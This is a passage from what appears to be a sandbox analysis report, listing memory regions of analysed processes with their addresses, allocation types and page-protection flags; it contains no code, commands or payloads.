page read and write
|
||
|
21EF071C000
|
heap
|
page read and write
|
||
|
21EF27CF000
|
heap
|
page read and write
|
||
|
190BA098000
|
heap
|
page read and write
|
||
|
21EF24D5000
|
heap
|
page read and write
|
||
|
190BA0F7000
|
heap
|
page read and write
|
||
|
21EF2580000
|
heap
|
page read and write
|
||
|
2F8B000
|
heap
|
page read and write
|
||
|
2F14000
|
trusted library allocation
|
page read and write
|
||
|
2F45000
|
trusted library allocation
|
page execute and read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
190B815A000
|
heap
|
page read and write
|
||
|
190B9F6F000
|
heap
|
page read and write
|
||
|
190BA086000
|
heap
|
page read and write
|
||
|
190B8159000
|
heap
|
page read and write
|
||
|
190B9F74000
|
heap
|
page read and write
|
||
|
2F13000
|
trusted library allocation
|
page execute and read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
8700000
|
trusted library allocation
|
page read and write
|
||
|
28EC000
|
stack
|
page read and write
|
||
|
190BA0BF000
|
heap
|
page read and write
|
||
|
190B835D000
|
heap
|
page read and write
|
||
|
21E80668000
|
trusted library allocation
|
page read and write
|
||
|
4A0E000
|
stack
|
page read and write
|
||
|
21EF2584000
|
heap
|
page read and write
|
||
|
190B80E0000
|
heap
|
page read and write
|
||
|
4778000
|
trusted library allocation
|
page read and write
|
||
|
8ABA9FE000
|
stack
|
page read and write
|
||
|
190BA0C2000
|
heap
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
ADEFD23000
|
stack
|
page read and write
|
||
|
8580000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
2335C067000
|
heap
|
page read and write
|
||
|
A515000
|
direct allocation
|
page execute and read and write
|
||
|
190B819B000
|
heap
|
page read and write
|
||
|
190BA1CC000
|
heap
|
page read and write
|
||
|
190BA0F3000
|
heap
|
page read and write
|
||
|
190B81FD000
|
heap
|
page read and write
|
||
|
190BA10B000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
2E6F000
|
heap
|
page read and write
|
||
|
190B822D000
|
heap
|
page read and write
|
||
|
190BA1B0000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
76BD000
|
stack
|
page read and write
|
||
|
836C000
|
stack
|
page read and write
|
||
|
190B81F3000
|
heap
|
page read and write
|
||
|
190BA0A5000
|
heap
|
page read and write
|
||
|
190B835E000
|
heap
|
page read and write
|
||
|
21E81EDF000
|
trusted library allocation
|
page read and write
|
||
|
190B81F4000
|
heap
|
page read and write
|
||
|
75A0000
|
heap
|
page execute and read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
21EF0662000
|
heap
|
page read and write
|
||
|
190B8213000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
190B8213000
|
heap
|
page read and write
|
||
|
2E31000
|
heap
|
page read and write
|
||
|
2F29000
|
trusted library allocation
|
page read and write
|
||
|
190B817B000
|
heap
|
page read and write
|
||
|
2D7F000
|
stack
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
481C000
|
stack
|
page read and write
|
||
|
2B8C000
|
heap
|
page read and write
|
||
|
495E000
|
stack
|
page read and write
|
||
|
21EF2640000
|
heap
|
page execute and read and write
|
||
|
CD15000
|
direct allocation
|
page execute and read and write
|
||
|
190B9F6A000
|
heap
|
page read and write
|
||
|
190B8158000
|
heap
|
page read and write
|
||
|
2F42000
|
trusted library allocation
|
page read and write
|
||
|
190B9F61000
|
heap
|
page read and write
|
||
|
21E80001000
|
trusted library allocation
|
page read and write
|
||
|
190BA190000
|
remote allocation
|
page read and write
|
||
|
21E80507000
|
trusted library allocation
|
page read and write
|
||
|
21EF05C0000
|
heap
|
page read and write
|
||
|
21EF2463000
|
trusted library allocation
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
190BA0A5000
|
heap
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
7477000
|
heap
|
page read and write
|
||
|
5A8C000
|
trusted library allocation
|
page read and write
|
||
|
190B9F6F000
|
heap
|
page read and write
|
||
|
2D77000
|
heap
|
page read and write
|
||
|
7070000
|
heap
|
page read and write
|
||
|
2E0B000
|
heap
|
page read and write
|
||
|
74EE000
|
heap
|
page read and write
|
||
|
21EF2470000
|
heap
|
page execute and read and write
|
||
|
21E902FD000
|
trusted library allocation
|
page read and write
|
||
|
190B9F61000
|
heap
|
page read and write
|
||
|
190B821F000
|
heap
|
page read and write
|
||
|
21EF1F20000
|
trusted library allocation
|
page read and write
|
||
|
5A49000
|
trusted library allocation
|
page read and write
|
||
|
2335C355000
|
heap
|
page read and write
|
||
|
190BA0E7000
|
heap
|
page read and write
|
||
|
5CD5000
|
trusted library allocation
|
page read and write
|
||
|
748B000
|
heap
|
page read and write
|
||
|
4860000
|
heap
|
page read and write
|
||
|
8ABA7FE000
|
stack
|
page read and write
|
||
|
190BA264000
|
heap
|
page read and write
|
||
|
D715000
|
direct allocation
|
page execute and read and write
|
||
|
7467000
|
heap
|
page read and write
|
||
|
ADF077E000
|
stack
|
page read and write
|
||
|
190BA099000
|
heap
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
21E81DD6000
|
trusted library allocation
|
page read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
190BA0FA000
|
heap
|
page read and write
|
||
|
21EF0580000
|
heap
|
page read and write
|
||
|
190BA0F6000
|
heap
|
page read and write
|
||
|
476E000
|
stack
|
page read and write
|
||
|
190B81BD000
|
heap
|
page read and write
|
||
|
190B9F65000
|
heap
|
page read and write
|
||
|
7760000
|
trusted library allocation
|
page read and write
|
||
|
21EF0620000
|
heap
|
page read and write
|
||
|
2335C020000
|
heap
|
page read and write
|
||
|
C315000
|
direct allocation
|
page execute and read and write
|
||
|
21E81DF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
190BA190000
|
remote allocation
|
page read and write
|
||
|
21E902CF000
|
trusted library allocation
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
190BA0BF000
|
heap
|
page read and write
|
||
|
21EF1ED0000
|
trusted library allocation
|
page read and write
|
||
|
21EF25C8000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
190BA0BF000
|
heap
|
page read and write
|
||
|
190B822B000
|
heap
|
page read and write
|
||
|
21EF258E000
|
heap
|
page read and write
|
||
|
190BA0E7000
|
heap
|
page read and write
|
||
|
5CD0000
|
trusted library allocation
|
page read and write
|
||
|
2E9A000
|
heap
|
page read and write
|
||
|
2B7E000
|
unkown
|
page read and write
|
||
|
190B9F61000
|
heap
|
page read and write
|
||
|
21EF0480000
|
heap
|
page read and write
|
||
|
190BA096000
|
heap
|
page read and write
|
||
|
190BA0CF000
|
heap
|
page read and write
|
||
|
72FE000
|
stack
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
21E807F6000
|
trusted library allocation
|
page read and write
|
||
|
21EF1FD5000
|
heap
|
page read and write
|
||
|
190B9F83000
|
heap
|
page read and write
|
||
|
E6E91FF000
|
unkown
|
page read and write
|
||
|
190B8210000
|
heap
|
page read and write
|
||
|
4880000
|
trusted library allocation
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E80802000
|
trusted library allocation
|
page read and write
|
||
|
4868000
|
heap
|
page read and write
|
||
|
2335C06D000
|
heap
|
page read and write
|
||
|
491E000
|
stack
|
page read and write
|
||
|
2335C000000
|
heap
|
page read and write
|
||
|
21EF2525000
|
heap
|
page read and write
|
||
|
77FB000
|
stack
|
page read and write
|
||
|
190B8142000
|
heap
|
page read and write
|
||
|
2E78000
|
heap
|
page read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
ADF017E000
|
stack
|
page read and write
|
||
|
21EF0665000
|
heap
|
page read and write
|
||
|
21EF25B3000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
21EF251D000
|
heap
|
page read and write
|
||
|
47DF000
|
stack
|
page read and write
|
||
|
21EF0669000
|
heap
|
page read and write
|
||
|
8270000
|
heap
|
page read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
48DE000
|
stack
|
page read and write
|
||
|
21EF1F60000
|
trusted library allocation
|
page read and write
|
||
|
190B9F89000
|
heap
|
page read and write
|
||
|
21EF0660000
|
heap
|
page read and write
|
||
|
5A21000
|
trusted library allocation
|
page read and write
|
||
|
190BA1CD000
|
heap
|
page read and write
|
||
|
21EF2AA0000
|
heap
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
2E3E000
|
heap
|
page read and write
|
||
|
72BE000
|
stack
|
page read and write
|
||
|
190B8350000
|
heap
|
page read and write
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
190BA0A5000
|
heap
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
21EF27A4000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
21EF05F0000
|
trusted library section
|
page read and write
|
||
|
21EF2775000
|
heap
|
page read and write
|
||
|
87C0000
|
direct allocation
|
page execute and read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
190BA1DD000
|
heap
|
page read and write
|
||
|
21EF0600000
|
trusted library section
|
page read and write
|
||
|
ADF027E000
|
stack
|
page read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
485D000
|
stack
|
page read and write
|
||
|
21EF06C5000
|
heap
|
page read and write
|
||
|
190BA1CD000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A31000
|
trusted library allocation
|
page read and write
|
||
|
21EF2770000
|
heap
|
page read and write
|
||
|
21EF27F1000
|
heap
|
page read and write
|
||
|
21EF27FD000
|
heap
|
page read and write
|
||
|
190B835A000
|
heap
|
page read and write
|
||
|
190BA0DA000
|
heap
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2335C350000
|
heap
|
page read and write
|
||
|
21E90074000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
trusted library allocation
|
page read and write
|
||
|
21E8072C000
|
trusted library allocation
|
page read and write
|
||
|
190BA0C6000
|
heap
|
page read and write
|
||
|
4A79000
|
trusted library allocation
|
page read and write
|
||
|
190B816E000
|
heap
|
page read and write
|
||
|
190B81D0000
|
heap
|
page read and write
|
||
|
190B81A7000
|
heap
|
page read and write
|
||
|
190B9F6C000
|
heap
|
page read and write
|
||
|
21EF1FD0000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
4A21000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
190B835E000
|
heap
|
page read and write
|
||
|
49C5000
|
heap
|
page execute and read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
ADF12CA000
|
stack
|
page read and write
|
||
|
21EF24D0000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
190B81D5000
|
heap
|
page read and write
|
||
|
2DF0000
|
trusted library section
|
page read and write
|
||
|
190BA1B6000
|
heap
|
page read and write
|
||
|
21E8080E000
|
trusted library allocation
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
74E5000
|
heap
|
page read and write
|
||
|
190BA098000
|
heap
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
8ABADFC000
|
stack
|
page read and write
|
||
|
190BA0EE000
|
heap
|
page read and write
|
||
|
190B9F6F000
|
heap
|
page read and write
|
||
|
190B81E5000
|
heap
|
page read and write
|
||
|
ADF11CE000
|
stack
|
page read and write
|
||
|
2F1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
ADF02FE000
|
stack
|
page read and write
|
||
|
190BA190000
|
remote allocation
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8529000
|
heap
|
page read and write
|
||
|
7419000
|
heap
|
page read and write
|
||
|
21E8120E000
|
trusted library allocation
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
190BA20B000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A1E000
|
unkown
|
page read and write
|
||
|
2335BFF0000
|
heap
|
page read and write
|
||
|
190B8359000
|
heap
|
page read and write
|
||
|
190B8203000
|
heap
|
page read and write
|
||
|
8500000
|
heap
|
page read and write
|
||
|
190BA0C6000
|
heap
|
page read and write
|
||
|
21EF1F22000
|
trusted library allocation
|
page read and write
|
||
|
21EF0560000
|
heap
|
page read and write
|
||
|
190B815F000
|
heap
|
page read and write
|
||
|
190B9F6F000
|
heap
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
190B9C00000
|
heap
|
page read and write
|
||
|
21EF1FB0000
|
heap
|
page read and write
|
||
|
5323000
|
trusted library allocation
|
page read and write
|
||
|
190BA0D4000
|
heap
|
page read and write
|
||
|
21E80790000
|
trusted library allocation
|
page read and write
|
||
|
190B9F87000
|
heap
|
page read and write
|
||
|
E115000
|
direct allocation
|
page execute and read and write
|
||
|
21EF06AB000
|
heap
|
page read and write
|
||
|
2335C060000
|
heap
|
page read and write
|
||
|
190B820E000
|
heap
|
page read and write
|
||
|
190B815F000
|
heap
|
page read and write
|
||
|
190B9FA4000
|
heap
|
page read and write
|
||
|
2F20000
|
trusted library allocation
|
page read and write
|
||
|
8ABAEFB000
|
stack
|
page read and write
|
||
|
2928000
|
stack
|
page read and write
|
||
|
2DE0000
|
trusted library section
|
page read and write
|
||
|
81C0000
|
trusted library allocation
|
page read and write
|
||
|
ADF1183000
|
stack
|
page read and write
|
||
|
21EF1F80000
|
heap
|
page execute and read and write
|
||
|
8ABABFF000
|
stack
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
190B8200000
|
heap
|
page read and write
|
||
|
21E90010000
|
trusted library allocation
|
page read and write
|
||
|
21EF062B000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
190BA0C1000
|
heap
|
page read and write
|
||
|
190BA070000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
190BA071000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
ADF124D000
|
stack
|
page read and write
|
||
|
190B9F7B000
|
heap
|
page read and write
|
||
|
8830000
|
trusted library allocation
|
page execute and read and write
|
||
|
49C0000
|
heap
|
page execute and read and write
|
||
|
190B820E000
|
heap
|
page read and write
|
||
|
21EF2460000
|
trusted library allocation
|
page read and write
|
||
|
21E80227000
|
trusted library allocation
|
page read and write
|
||
|
190BA1DA000
|
heap
|
page read and write
|
||
|
190B9F78000
|
heap
|
page read and write
|
||
|
8520000
|
heap
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
7321000
|
heap
|
page read and write
|
||
|
21E804AE000
|
trusted library allocation
|
page read and write
|
There are 493 hidden memdumps, click here to show them.